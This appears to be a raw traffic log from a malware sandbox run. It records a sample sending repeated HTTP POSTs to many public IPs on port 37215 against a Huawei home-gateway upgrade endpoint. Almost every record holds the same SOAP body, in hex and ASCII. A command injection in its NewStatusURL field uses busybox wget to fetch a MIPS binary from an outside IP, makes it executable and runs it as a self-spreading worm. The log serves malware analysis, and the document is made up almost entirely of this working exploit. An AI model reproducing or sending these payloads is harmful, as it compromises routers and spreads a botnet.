3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1678192.168.2.1344862212.68.207.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.598251104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1679192.168.2.134289041.24.167.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.598268986 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1680192.168.2.135374841.57.124.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617013931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1681192.168.2.1351704157.75.180.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617039919 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1682192.168.2.1349594157.112.223.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617136002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1683192.168.2.1333346197.6.241.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617155075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1684192.168.2.1348374157.4.232.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617180109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1685192.168.2.1337260197.72.224.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617191076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1686192.168.2.1344038157.207.180.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617202044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1687192.168.2.1357810197.81.168.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617249012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1688192.168.2.1343076197.123.178.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.617257118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
